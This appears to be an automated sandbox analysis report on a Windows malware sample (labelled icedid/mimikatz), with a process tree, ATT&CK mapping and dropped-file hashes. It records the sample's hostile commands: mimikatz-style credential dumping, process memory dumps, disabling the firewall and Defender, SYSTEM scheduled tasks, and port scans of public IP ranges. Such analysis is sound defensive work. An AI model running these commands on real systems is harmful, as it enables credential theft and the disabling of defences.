PID 2940 wrote to memory of 2168	2940	ejrscct.exe	48
PID 2940 wrote to memory of 2168	2940	ejrscct.exe	48
PID 2940 wrote to memory of 860	2940	ejrscct.exe	50
PID 2940 wrote to memory of 860	2940	ejrscct.exe	50
PID 2940 wrote to memory of 860	2940	ejrscct.exe	50
PID 2940 wrote to memory of 860	2940	ejrscct.exe	50
PID 860 wrote to memory of 1220	860	cmd.exe	52
PID 860 wrote to memory of 1220	860	cmd.exe	52
PID 860 wrote to memory of 1220	860	cmd.exe	52
PID 860 wrote to memory of 1220	860	cmd.exe	52
PID 860 wrote to memory of 1220	860	cmd.exe	52
PID 860 wrote to memory of 1220	860	cmd.exe	52
PID 860 wrote to memory of 1220	860	cmd.exe	52
PID 1220 wrote to memory of 1540	1220	wpcap.exe	53

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1076
- C:\Windows\TEMP\usvutgbni\dlgdbm.exe
  "C:\Windows\TEMP\usvutgbni\dlgdbm.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2056

C:\Users\Admin\AppData\Local\Temp\2025-01-06_08ec21231650ce1e9e2e34fa6b8d1c93_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2025-01-06_08ec21231650ce1e9e2e34fa6b8d1c93_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:592
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\gebuasnt\ejrscct.exe
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:2004
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2320
- - C:\Windows\gebuasnt\ejrscct.exe
    C:\Windows\gebuasnt\ejrscct.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2472

C:\Windows\gebuasnt\ejrscct.exe
C:\Windows\gebuasnt\ejrscct.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2696
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2780
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:2708
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - Modifies data under HKEY_USERS
  PID:2616
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2604
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2168
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\bbbudkzem\eupselbrp\wpcap.exe /S
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:860
- - C:\Windows\bbbudkzem\eupselbrp\wpcap.exe
    C:\Windows\bbbudkzem\eupselbrp\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1220
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1540
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        
        PID:1692
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      System Location Discovery: System Language Discovery
      PID:872
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1660
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      PID:1548
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        
        PID:1808
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:2804
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2076
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2208
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2984
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:2632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1884
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:948
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:2448
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\bbbudkzem\eupselbrp\cqkgbschn.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bbbudkzem\eupselbrp\Scant.txt
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2784
- - C:\Windows\bbbudkzem\eupselbrp\cqkgbschn.exe
    C:\Windows\bbbudkzem\eupselbrp\cqkgbschn.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bbbudkzem\eupselbrp\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:1984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\bbbudkzem\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\bbbudkzem\Corporate\log.txt
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:2220
- - C:\Windows\bbbudkzem\Corporate\vfshost.exe
    C:\Windows\bbbudkzem\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2176
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "utbichenq" /ru system /tr "cmd /c C:\Windows\ime\ejrscct.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1516
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "utbichenq" /ru system /tr "cmd /c C:\Windows\ime\ejrscct.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1524
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "aittgisub" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gebuasnt\ejrscct.exe /p everyone:F"
  2⤵
  PID:2476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2108
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "aittgisub" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gebuasnt\ejrscct.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gjsvgpriq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\usvutgbni\dlgdbm.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1520
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "gjsvgpriq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\usvutgbni\dlgdbm.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2324
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1936
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2292
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:2936
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:2912
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - Modifies data under HKEY_USERS
  PID:2648
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1648
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:992
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2412
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - Modifies data under HKEY_USERS
  PID:568
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1616
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1144
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - Modifies data under HKEY_USERS
  PID:1012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1780
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2800
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:2788
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:540
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - Modifies data under HKEY_USERS
    PID:2960
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2680
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2992
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1740
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    PID:1252
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:3044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2816
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:964
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1220
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1656
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:2044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1612
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2924
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1820
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:1176
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  PID:2980
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1208
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:1716
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2944
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:832
- C:\Windows\TEMP\bbbudkzem\nehbuguun.exe
  C:\Windows\TEMP\bbbudkzem\nehbuguun.exe -accepteula -mp 1040 C:\Windows\TEMP\bbbudkzem\1040.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:112
- C:\Windows\TEMP\bbbudkzem\nehbuguun.exe
  C:\Windows\TEMP\bbbudkzem\nehbuguun.exe -accepteula -mp 1068 C:\Windows\TEMP\bbbudkzem\1068.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2428
- C:\Windows\TEMP\bbbudkzem\nehbuguun.exe
  C:\Windows\TEMP\bbbudkzem\nehbuguun.exe -accepteula -mp 1076 C:\Windows\TEMP\bbbudkzem\1076.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3004
- C:\Windows\TEMP\bbbudkzem\nehbuguun.exe
  C:\Windows\TEMP\bbbudkzem\nehbuguun.exe -accepteula -mp 888 C:\Windows\TEMP\bbbudkzem\888.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2420
- C:\Windows\TEMP\bbbudkzem\nehbuguun.exe
  C:\Windows\TEMP\bbbudkzem\nehbuguun.exe -accepteula -mp 1500 C:\Windows\TEMP\bbbudkzem\1500.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2752
- C:\Windows\TEMP\bbbudkzem\nehbuguun.exe
  C:\Windows\TEMP\bbbudkzem\nehbuguun.exe -accepteula -mp 760 C:\Windows\TEMP\bbbudkzem\760.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1184
- C:\Windows\TEMP\bbbudkzem\nehbuguun.exe
  C:\Windows\TEMP\bbbudkzem\nehbuguun.exe -accepteula -mp 2484 C:\Windows\TEMP\bbbudkzem\2484.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:288
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\bbbudkzem\eupselbrp\scan.bat
  2⤵
  - Loads dropped DLL
  PID:1824
- - C:\Windows\bbbudkzem\eupselbrp\ecskfpnbu.exe
    ecskfpnbu.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:1716
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3096
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:3584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2568
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2692

C:\Windows\SysWOW64\zmxrwm.exe
C:\Windows\SysWOW64\zmxrwm.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1464

C:\Windows\system32\taskeng.exe
taskeng.exe {0509F01E-80B8-4746-9D8F-D5992A06B16B} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2608
- C:\Windows\system32\cmd.EXE
  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\usvutgbni\dlgdbm.exe /p everyone:F
  2⤵
  PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:376
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\TEMP\usvutgbni\dlgdbm.exe /p everyone:F
    3⤵
    PID:2332
- C:\Windows\system32\cmd.EXE
  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gebuasnt\ejrscct.exe /p everyone:F
  2⤵
  PID:2124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2872
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\gebuasnt\ejrscct.exe /p everyone:F
    3⤵
    PID:692
- C:\Windows\system32\cmd.EXE
  C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ejrscct.exe
  2⤵
  PID:588
- - C:\Windows\ime\ejrscct.exe
    C:\Windows\ime\ejrscct.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of SetWindowsHookEx
    PID:2684
- C:\Windows\system32\cmd.EXE
  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\gebuasnt\ejrscct.exe /p everyone:F
  2⤵
  PID:1192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2320
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\gebuasnt\ejrscct.exe /p everyone:F
    3⤵
    PID:2800
- C:\Windows\system32\cmd.EXE
  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\usvutgbni\dlgdbm.exe /p everyone:F
  2⤵
  PID:2892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2316
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\TEMP\usvutgbni\dlgdbm.exe /p everyone:F
    3⤵
    PID:928
- C:\Windows\system32\cmd.EXE
  C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ejrscct.exe
  2⤵
  PID:3112
- - C:\Windows\ime\ejrscct.exe
    C:\Windows\ime\ejrscct.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of SetWindowsHookEx
    PID:3132

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\bbbudkzem\1040.dmp

Filesize
1.3MB

MD5
7389a9710bf02de24732d13804067489

SHA1
1c92d88b14db05cfe6e5fd6d8f7514ace40a9b03

SHA256
5e9a61ed1656adbb4b8e37f4a204fe852fb87c5fc87dfce727269512aadf3f8f

SHA512
9c7769691680293c668d3dcf9a785439bf3442573ebb879fda2d0231c47e34ecfbdc5bf3c5e473e797aeb3a8bd4e0eeb8ec70a06cdf37f5d16ef259e1d480b75

Download Submit
C:\Windows\TEMP\bbbudkzem\1068.dmp

Filesize
1.4MB

MD5
359ec9da695a74115f6448bec6386e2b

SHA1
80c7fb221925339d30012550f9476d1428cc0a88

SHA256
af267c9b22898f1aaf9ed24b3b5c032ba9e3ed2bb54035acd18016663b6a4791

SHA512
ba4e392f58120f5c9a3c5a73687ee3a9cf54bed4830694e4555fe68f1d8fbfbb23c61fd9f6f8647f75fb2413a1bf070889f22b70bd16812607287e2d1928fb50

Download Submit
C:\Windows\TEMP\bbbudkzem\1076.dmp

Filesize
4.6MB

MD5
40a3dfc3fb6f1c5c304473e887b54567

SHA1
aeaade3fff04398c4b1ae536289b31c4aab99e65

SHA256
a7dfa7d542dca20e40d3799bda67667993c84a061230a6feb91188e901c7c4ae

SHA512
a2fc687c30045a012ef7aacadd61d7414a9b6f04361fb4b89c899de70120d8f4a78e51639d75ab3c956f36bdda96d7be23eb16879dcdf9536bca45b3ab9571ad

Download Submit
C:\Windows\TEMP\bbbudkzem\1500.dmp

Filesize
4.0MB

MD5
dddf8ee0c047695aec92203422489b6f

SHA1
c13a47e05435749a3d664395b45a6ff6750bdf65

SHA256
b83918fdd94027c7e17284ad62e23b8d0899c3f528a4862d0fdd2af758cf3b5f

SHA512
639a6978846ee1661c123113d12f718ab503785403c7d788548b630516365822d73a2d931d98472ef5cfcc290d2d7b75802b72b3a73e434fe5b05b21ca1a7861

Download Submit
C:\Windows\TEMP\bbbudkzem\2484.dmp

Filesize
7.2MB

MD5
ba15c2172ce89ff8d32a3f94cee20185

SHA1
05c18d1b157be6f13ab4a831747bd4cc3f4f9f15

SHA256
a7b0a7967ccae4cb35b720c6fdc121f47e5d401d028a4adb3c4756582154328f

SHA512
8a591a5b802b8b1be6e1c975cd0576791bfef1f79dff7c51cfe5393dbd59460a546f599172cdfb77b7cf8c0081934e9431ec1301bd60f911f6ff8d3b1a8ccf9b

Download Submit
C:\Windows\TEMP\bbbudkzem\760.dmp

Filesize
2.1MB

MD5
a12fc091b82fe14326ed5820edcb1f2d

SHA1
ec5758983e7dce766957ec4da3f824034972f7d2

SHA256
06708d4cb87f1d4402542fe064702f43aa0fb2d1c92adc02c68a711e19bd0d88

SHA512
e9a2d2b3754eb824caec8827abd0c353180ea8bba9225fdc76c95ebec691a3bdb5b0be4328367704c917551000aec9c0b44e180f9e80e4a9d21c82a034cd048a

Download Submit
C:\Windows\TEMP\bbbudkzem\888.dmp

Filesize
5.2MB

MD5
896dce1a875988b3ca93d73a6b1e4fdd

SHA1
6bab26d08ef7a7b85eff7dde587a7dc01428c1f9

SHA256
ca2ef5e8c4588f8161e466a00c9f2874e003f86711f95d27032a15fb9bfec799

SHA512
c2d950c27b0b4b371c6ceb7c4c5fda282885d8f0b54e091028388ba92662df30f282a215df3f3da822bfce4ff92ea51fa52db31adb6a46d032c635b48c130c2d

Download Submit
C:\Windows\TEMP\usvutgbni\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
